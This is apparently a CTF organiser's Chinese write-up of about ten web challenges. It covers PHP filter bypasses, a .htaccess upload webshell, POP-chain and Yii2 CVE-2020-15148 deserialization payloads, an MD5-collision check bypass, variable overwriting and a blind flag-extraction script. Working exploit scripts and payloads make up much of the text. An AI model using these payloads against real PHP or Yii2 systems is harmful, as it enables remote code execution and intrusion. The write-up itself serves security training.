寫在前面

我出的題不太難，但是有意思，個人感覺質量還是不錯的，有簡單有難，區分度明顯，這里出個部分wp，這里感謝atao讓本懶狗少了一部分作業量o(￣▽￣)ブ

入門

fastapi

本來是作為一個簽到題出的，事實上也是
首先看到官網，有個能查到api的地方得到路徑

看到引數名，想到后端是eval，題目里面打錯了是f10g，

直接

解法一

解法二

可以執行任意命令了

解法三

當然SSTI的方式也可以打出來，自己去找找學一學，看看我的這一篇

shell

倒是不難，出了點小事故后面又放了新的，這里寫下預期

preg_match('/[0-9]|[a-z]|\^|\+|\||\$|\[|\]|\{|\}|\&|\-/i', $c)

能看到這里過濾蠻多，但是發現~在，直接取反就行了，Y4自用腳本建議私藏

<?php

function negateRce(){
    fwrite(STDOUT,'[+]your function: ');

    $system=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));

    fwrite(STDOUT,'[+]your command: ');

    $command=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));

    echo '[*] (~'.urlencode(~$system).')(~'.urlencode(~$command).');';
}

negateRce();

執行，有手就行

system("cat /flag");

奇妙的驗證碼

被某個野獸出題人要求做了一下，這里整理我的題目的時候看到了腳本就順便說一下
爆出密碼

得到flag

腳本如下，比較騷，彈計算器，不愧是某pu

import requests
session = requests.session()

url_pre = 'http://xxxxx'
url_cap = url_pre + '/captcha.php'
url_log = url_pre + '/login.php'

for i in range(1000,9999):
    res = session.get(url_cap).text
    while '__import__' in res:
        res = session.get(url_cap).text
    data = {
        'username': 'admin',
        'password': f'{i}',
        'captcha': (eval(res)),
        'objectType': 'Window',
    }
    r = session.post(url_log, data=data)
    if "Wrong username or password" not in eval(r.text)['msg']:
        print(r.text)
        print(i)

野獸先輩的檔案

首先點開題目，界面很簡單

嘗試下載flag,發現足足1pb，這么大的檔案顯然無法在合理的時間下載完

已經暗示（其實幾乎是明示）了flag就在檔案的末尾，要“跳過去”看，

想想平時用的多執行緒下載器，它可以從檔案的中間部分下載，每一個執行緒負責下載檔案的某一部分最后組合起來，實作多執行緒告訴下載，這樣的下載器都能跳，那么一定有一個方法可以從檔案中的任意一點開始下載，

這個時候，動動手指就可以搜到原理了，

看到range頭格式如下，

那么打開我們心愛的Burp，手動發包試試，
（Burp的基礎原理這道題就不介紹了，Google，請

如上圖所示，當我們請求Range為1000-2000的時候，服務器回傳了檔案1000-2000位元組的內容，并且告訴了我們檔案的總大小是1145141919810893個位元組，順便說一下我們的瀏覽器也是通過這種辦法在下載檔案的時候獲取檔案的總大小的，

那么我們更換bytes里的內容，直接讀取檔案最后，就可以拿到flag了，

Bypass_waf

看到就怕了吧，hh

解法一

php太靈活了，所以繞過很多，自寫腳本，自己理解下

<?php
/**
 * Created by Y4tacker
 **/



function generatePayload($eval){
    $res = '';
    for ($i=0;$i<strlen($eval);$i++){
        if ($i!=strlen($eval)-1){
            $tmp = "chr(".ord($eval[$i]).").";
        }else{
            $tmp = "chr(".ord($eval[$i]).")";
        }
        $res.=$tmp;
    }
    return "(join(array(".$res.")))";
}

$eval = "system";
$command = "cat /flag";

echo "eval=".generatePayload($eval).generatePayload($command).";&look=1";

解法二

對于POST的內容，它是通過file_get_contents('php://input')獲得的內容，這里就有了第一個繞過方法，將POST請求改為multipart/form-data則上述方法無法接收到引數，過濾函式就無法起到作用，可以繞過，

解法三

Payload來自：lastsward

upload

點我學一學
這里發現存在原始碼泄露www.zip，
過濾了file，用\繞過即可

<Fil\
es .htaccess>
SetHandler application/x-httpd-php
Require all granted
php_flag engine on
</Fi\
les>
php_value auto_prepend_fi\
le .htaccess
#<?php phpinfo();

這里用php自帶函式繞過

unserialize

考點：簡單的POP鏈構造、MD5碰撞
代碼如下：

<?php
error_reporting(0);
highlight_file(__FILE__);
class hackMe{
    protected $formatters;   
    public function __call($method, $attributes){
        return $this->format($method, $attributes);
    }
    
    public static function hackMMM(){
        echo "Hello web🐶!";
    }

    public function format($formatter, $arguments)
    {
        $this->getFormatter($formatter)->patch($arguments[0][4][1]);
    }
    public function getFormatter($formatter)
    {
        if (isset($this->formatters[$formatter])) {
            return $this->formatters[$formatter];
        }
    }
}

class Ox401{
    protected $events;
    protected $event;
    public function __destruct(){
        $this->events->dispatch($this->event);
    }
     public static function welcome(){
        echo "Welcome to 0x401 Team!";
    }
}

class flag{
    protected $f1ag;
    public function patch($Fire){
        call_user_func($this->f1ag,$Fire);
    }
}

if($_POST['a']!=$_POST['b'] && md5($_POST['a'])===md5($_POST['b'])){
    if(file_get_contents(substr($_POST['a'],0,20))!=null){
        @unserialize(base64_decode($_POST['c']));
    }else{
        hackMe::hackMMM();
    }
}else{
    Ox401::welcome();
}
?>

在進行反序列化之前會有md5的強比較，之前遇到這種值的時候，一般繞過手段是使用陣列或者是一對特定的字串，但是這里額外加入了一個條件file_get_contents(substr($_POST['a'],0,20))，如果去不到這個檔案，那也不能進行反序列化，所以這里使用了fastcoll工具，它可以對指定檔案進行md5碰撞，從而獲得兩個md5值相同的檔案

shell
fastcoll.exe -p 123.txt -o 1.txt 2.txt
工具下載
鏈接:https://pan.baidu.com/s/1t8q89aP50oiFVyFe0JrbJw
提取碼:atao
復制這段內容后打開百度網盤手機App，操作更方便哦

接著就是構造POP鏈了

class Ox401 -> __destruct		//建立hackMe物件,當呼叫不存在的方法時觸發__call
↓↓↓
class hackMe -> __call 			//建立flag物件
↓↓↓
class flag -> patch				//回呼函式進行代碼執行

exp

<?php
class hackMe{
    protected $formatters;
    public function __construct(){
        $this->formatters['dispatch'] = new flag();
    }
}

class Ox401{
    protected $events;
    protected $event;
    public function __construct(){
        $this->events = new hackMe();
        $this->event[4][1]= "cat /flag";
    }
}

class flag{
    protected $f1ag = "system";
}

echo base64_encode(serialize(new Ox401()))."\n";

ez_upload

過濾的更嚴格了，這里推薦另一種之前考過的利用htaccess讀檔案，這樣如果flag匹配到，則404頁面顯示y4tacker，因此利用這個特性搞定

import requests
import string

addr = '28957c94804599d479ebab0c1eb12156'
def check(a):
  f = '''
  <If "fi\\
le('/flag')=~ /'''+a+'''/">
 ErrorDocument 404 "y4tacker"
 </If>
  '''
  resp = requests.post("http://42x.250:xxxx/index.php",data={'submit': 'submit'}, files={'file': ('.htaccess',f)} )
  a = requests.get("http://42.1xxxx18816/upload/"+addr+"/a").text
  if "y4tacker" not in a:
   return False
  else:
   return True
flag = "flag{"
c = "u-"+string.ascii_letters + string.digits + "\{\}"
for j in range(32):
 for i in c:
  print("checking: "+ flag+i)
  if check(flag+i):
   flag = flag+i
   print(flag)
   break
  else:
   continue

easy_yii

看到這個，根據hint就去學一下yii利用鏈子就行了

我博客也有的，很簡單，學一下命名空間請

加了點過濾而已，最終payload

http://url/web/?r=test/test&name=O%3A23%3A%22yii%5Cdb%5CBatchQueryResult%22%3A1%3A%7Bs%3A36%3A%22%00yii%5Cdb%5CBatchQueryResult%00_dataReader%22%3BO%3A15%3A%22Faker%5CGenerator%22%3A1%3A%7Bs%3A13%3A%22%00%2A%00formatters%22%3Ba%3A1%3A%7Bs%3A5%3A%22close%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A20%3A%22yii%5Crest%5CIndexAction%22%3A2%3A%7Bs%3A11%3A%22checkAccess%22%3Bs%3A14%3A%22highlight_file%22%3Bs%3A2%3A%22id%22%3Bs%3A5%3A%22%2Fflag%22%3B%7Di%3A1%3Bs%3A3%3A%22run%22%3B%7D%7D%7D%7D


<?php
namespace yii\db;
class BatchQueryResult extends \yii\base\BaseObject{
    private $_dataReader;
    public function __construct()
    {
        $this->_dataReader=new \Faker\Generator();
    }
}
namespace yii\base;
class BaseObject{
}
namespace yii\rest;
class Action{

    public $checkAccess='highlight_file';
    public $id='/flag';
}
class IndexAction extends Action{
}
namespace Faker;
class Generator{
    protected $formatters = array();
    public function __construct()
    {
        $this->formatters['close']=[(new \yii\rest\IndexAction()),"run"];
    }
}
use \yii\db\BatchQueryResult;
$c=new BatchQueryResult();
print(urlencode(serialize($c)));

ez_auth

打開題目代碼如下

<?php 
error_reporting(0); 
include "config.php"; 

function LoginSign($array, $key) 
{ 
    if (isset($array['auth'])){ 
        unset($array['auth']); 
    } 
    return md5(implode('-', $array) . $key); 
} 

foreach ($_GET as $key => $val) { 
    if (!isset($$key)) { 
        $$key = $val; 
    } 
} 

foreach ($_POST as $key => $val) { 
    //過濾全域變數 
    if (isset($key) && $val[0] !== '_') { 
        $tmp = json_decode($val); 
        foreach ($tmp as $kkey => $vval) { 
            ${$key}[$kkey] = $vval; 
        } 
    }else{ 
        die("fucccc????"); 
    } 
} 
if (isset($auth)) { 
    if (LoginSign($_GET, $secrett) === $auth) { 
        if (in_array($username, array('admin'))) { 
            echo("Congratulations!</br>Give you flag?:"); 
            echo fread(fopen("/flag","r"),200); 
        } else { 
            echo 'welcome ' . $username . 'but only admin can get flag!'; 
            echo '</br>'; 
        } 
    } else { 
        echo 'wrong auth.</br>Guess the authkey???'; 
    } 
} else { 
    highlight_file(__FILE__); 
    die("Please Login first!"); 
     
} 

我們需要抓住幾個地方，第一點，對于不存在的變數，可以通過get請求實作賦值

foreach ($_GET as $key => $val) { 
    if (!isset($$key)) { 
        $$key = $val; 
    } 
} 

第二點，我們可以通過post傳參實作對除全域變數以外的值

foreach ($_POST as $key => $val) { 
    //過濾全域變數 
    if (isset($key) && $val[0] !== '_') { 
        $tmp = json_decode($val); 
        foreach ($tmp as $kkey => $vval) { 
            ${$key}[$kkey] = $vval; 
        } 
    }else{ 
        die("fucccc????"); 
    } 
} 

回到拿flag的地方

if (isset($auth)) { 
    if (LoginSign($_GET, $secrett) === $auth) { 
        if (in_array($username, array('admin'))) { 
            echo("Congratulations!</br>Give you flag?:"); 
            echo fread(fopen("/flag","r"),200); 
        } 

我們從最里層一層一層網上，首先是in_array($username, array('admin')，，沒有username變數，可以通過GET請求賦值為admin使其滿足條件，下一層
LoginSign($_GET, $secrett) === $auth

function LoginSign($array, $key) 
{ 
    if (isset($array['auth'])){ 
        unset($array['auth']); 
    } 
    return md5(implode('-', $array) . $key); 
} 

我們通過get傳參傳入的變數auth與真正的auth的md5進行比較，而由于可以使用post傳參進行變數覆寫，這個auth也自然可控制了，參考payload

http://xxx/index.php?username=admin&auth=b5d0baf7bc06b412e077c422e5b3cb74

secrett=["1", "1", "1", "1", "1", "1", "1", "1", "1", "1", "1", "1", "1","1", "1", "1", "1", "1", "1", "1", "1","1", "1", "1", "1", "1", "1", "1","1", "1", "1", "1"]

not_sql

原始碼泄露www.zip
首先是index.php，根據file傳入引數引入檔案

<?php
require_once "func.php";

if(isset($_GET['file'])){
	require_once(__DIR__."/".$_GET['file'].".php");
}
else{
	if($_SESSION['login']=='apuNvZHuang'){
		echo "<script>window.location.href='./index.php?file=update'</script>";
	}
	else{
		echo "<script>window.location.href='./index.php?file=login'</script>";
	}
}
?>

接下來是登錄頁面，還算是比較嚴格

從update,php當中可以看見，只要登錄就有flag

<?php
require_once('func.php');
echo '<html>
<meta charset="utf-8">
<title>update</title>
</html>';
if ($_SESSION['login']!='apuNvZHuang'){
	echo "登陸admin就給Flag，我保證，🙏！";
}
$users=new User();
$users->update();
if($_SESSION['login']==='apuNvZHuang'){
	require_once("flag.php");
	echo $flag;
}

?>

接下來func.php

<?php
error_reporting(0);
session_start();
function safe($parm){
        $array= array('out','like','union','regexp','load','into','flag','dump','insert',"'",'\\',"*","alter");
    return str_replace($array,'fuckU!',$parm);
}
class User
{
    public $id;
    public $age=null;
    public $nickname=null;
    public function login() {
        if(isset($_POST['username'])&&isset($_POST['password'])){
        $mysqli=new dbCtrl();
        $this->id=$mysqli->login('select id,password from user where username=?');
        if($this->id){
        $_SESSION['id']=$this->id;  
        $_SESSION['login']='apuNvZhuang';
        echo "你好！".$_SESSION['token'];
        echo "<script>window.location.href='./update.php'</script>";
        return $this->id;
        }
    }
}
    public function update(){
        $Info=unserialize($this->getNewinfo());
        $age=$Info->age;
        $nickname=$Info->nickname;
        $updateAction=new UpdateHelper($_SESSION['id'],$Info,"update user SET age=$age,nickname=$nickname where id=".$_SESSION['id']);
    }
    public function getNewInfo(){
        $age=$_POST['age'];
        $nickname=$_POST['nickname'];
        return safe(serialize(new Info($age,$nickname)));
    }
    public function __destruct(){
        return file_get_contents($this->nickname);//危
    }
    public function __toString()
    {
        $this->nickname->update($this->age);
        return "";
    }
}
class Info{
    public $age;
    public $nickname;
    public $CtrlCase;
    public function __construct($age,$nickname){
        $this->age=$age;
        $this->nickname=$nickname;
    }   
    public function __call($name,$argument){
        echo $this->CtrlCase->login($argument[0]);
    }
}
Class UpdateHelper{
    public $id;
    public $newinfo;
    public $sql;
    public function __construct($newInfo,$sql){
        $newInfo=unserialize($newInfo);
        $upDate=new dbCtrl();
    }
    public function __destruct()
    {
        echo $this->sql;
    }
}
class dbCtrl
{
    public $hostname="127.0.0.1";
    public $dbuser="y4tacker";
    public $dbpass="y4tacker";
    public $database="y4tacker";
    public $name;
    public $password;
    public $mysqli;
    public $token;
    public function __construct()
    {
        $this->name=$_POST['username'];
        $this->password=$_POST['password'];
        $this->token=$_SESSION['token'];
    }
    public function login($sql)
    {
        $this->mysqli=new mysqli($this->hostname, $this->dbuser, $this->dbpass, $this->database);
        if ($this->mysqli->connect_error) {
            die("connection error:" . $this->mysqli->connect_error);
        }
        $result=$this->mysqli->prepare($sql);
        $result->bind_param('s', $this->name);
        $result->execute();
        $result->bind_result($idResult, $passwordResult);
        $result->fetch();
        $result->close();
        if ($this->token=='admin') {
            return $idResult;
        }
        if (!$idResult) {
            echo('wrong user!');
            return false;
        }
        if (md5($this->password)!==$passwordResult) {
            echo('wrong password！');
            return false;
        }
        $_SESSION['token']=$this->name;
        return $idResult;
    }

}

又臭又長，但是首行很明顯，能猜測考點是反序列化字符逃逸

function safe($parm){
        $array= array('out','like','union','regexp','load','into','flag','dump','insert',"'",'\\',"*","alter");
    return str_replace($array,'fuckU!',$parm);
}

找找利用點，

很明顯接下來就是構造pop鏈了

UpdateHelper->__destruct
User->__toString
Info->__call
dbCtrl->login

給出鏈子大家學一學

class User
{
    public $age='select password,id from user where username=?';
    public $nickname=null;
}
class Info{
    public $age;
    public $nickname;
    public $CtrlCase;
}
class UpdateHelper
{
    public $sql;
}
class dbCtrl
{
    public $hostname = "127.0.0.1";
    public $dbuser="noob123";
    public $dbpass="noob123";
    public $database="noob123";
    public $name='admin';
    public $token = 'admin';
}

function post($data){
    $data = http_build_query($data);
    $opts = array (
        'http' => array (
            'method' => 'POST',
            'header'=> "Content-type: application/x-www-form-urlencoded\r\n" .
                "Content-Length: " . strlen($data) . "\r\n",
            'content' => $data
        )
    );
    $html = file_get_contents('http://42.192.137.212:1235/index.php?action=update', false, stream_context_create($opts));
    echo $html;
}

$x = new UpdateHelper();
$x->sql = new User();
$x->sql->nickname = new Info();
$x->sql->nickname->CtrlCase = new dbCtrl();

如果我們能夠正確反序列化也就可以實作任意sql陳述句的執行了
接下來我們去實作逃逸的操作，這里我用union沒替換為一次fu**u!就擠出去一個字符

$p = '";s:8:"CtrlCase";' . serialize($x) . "}";
$p = str_repeat('union', strlen($p)).$p;
echo($p);

有手就行

[MTCTF]從出題人視角看ez_cms

推薦文章

無字母數字webshell之提高篇
[CTF]PHP反序列化總結
[CTF].htaccess的使用技巧總結
[PHP代碼審計][CVE-2020-15148]Yii2＜2.0.38反序列化命令執行